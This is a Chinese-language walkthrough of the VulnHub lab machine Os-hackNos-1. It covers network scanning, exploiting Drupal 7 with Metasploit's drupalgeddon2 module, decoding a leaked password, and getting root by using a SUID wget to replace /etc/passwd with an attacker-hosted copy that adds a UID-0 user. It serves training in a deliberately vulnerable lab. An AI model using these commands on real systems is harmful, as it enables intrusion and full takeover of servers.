vulnhub靶机Os-hackNos-1

一、信息收集

首先扫描靶机IP：

arp-scan 192.168.1.0/24

确定靶机IP为：192.168.1.110后，扫描靶机端口开放情况：

nmap -sV -p 0-65535 192.168.1.110

可以看见靶机只开放了22和80端口，然后先访问一下80端口看一下：

是一个Apache2的页面，除此之外就没发现什么其他的东西了，然后再扫描一下目录看看会有什么发现：

dirb http://192.168.1.110

经过目录爆破后发现一个drupal的目录，进去看一下：

是一个登录界面，再看一下刚刚同时爆出来的一个robots.txt文件：

二、漏洞利用

也并没有发现什么可疑之处，然后再回过来看这主页面，它使用的是drupal管理框架，然后我们就可以顺着这个点找下去。我们可以先用whatweb工具来爆破一下它的版本号是多少：

whatweb 192.168.1.110/drupal

在这里我们发现它的Apache的版本号是2.4.18，drupal是brupal7，接下来使用msfconsole工具搜索它的漏洞：

msfconsole
search drupal

在这里我们选择第4个：

use exploit/unix/webapp/drupal_drupalgeddon2
show options

set rhosts 192.168.1.110
set targeturi /drupal
run
shell
获得shell以后，把它提升为交互式shell：
python3 -c "import pty;pty.spawn('/bin/bash')"

然后我们进入网站根目录发现一个txt文件：

打开以后是一段密文，base64解码以后为：

经过搜索查询了解到，这是brainfuck加密后的密文，然后再进行解码：
解码网址为：https://www.splitbrain.org/services/ook


解码出来是：james:Hacker@451，这好像是一个账户，尝试切换用户试一下：

发现并行不通，然后接下来尝试一下suid提权。

三、提权

因为有suid权限的命令可以以文件拥有者的权限执行，经过在网上搜索，找到了查询特权文件的命令：

find / -perm -u=s -type f 2>/dev/null

经过查询得知，有wget命令可以以普通用户的身份用root权限去执行，那么我们就可以利用它修改passwd文件，添加一个拥有root权限的用户，这样一切换用户就可以直接到root用户了。
回到攻击机，先创建一个本地加密用户：

openssl passwd -1 -salt admin 111111

然后再把靶机里的passwd文件下载出来。首先用python3在靶机里搭建一个简易的服务器，然后再用攻击机下载：

cd /etc
python3 -m http.server 8888
wget http://192.168.1.110:8888/passwd

下载下来以后，再把刚刚创建的那个加密的本地用户添加到这个文件中,添加完以后，再在攻击机上搭建一个简易的服务器，再下载到靶机里，把原来的passwd文件给覆盖掉：

echo 'admin:$1$admin$2WRLhTGcIMgZ7OhwCpREK1:0:0::/root:/bin/bash' >> passwd
python3 -m http.server 6666
wget http://192.168.1.107:6666/passwd -O passwd

（-O：指定文件名。使用wget -O就是把靶机原来的passwd文件给覆盖）


然后查看一下这个文件，是否插入进去：

确定插入进来以后，直接切换用户即可：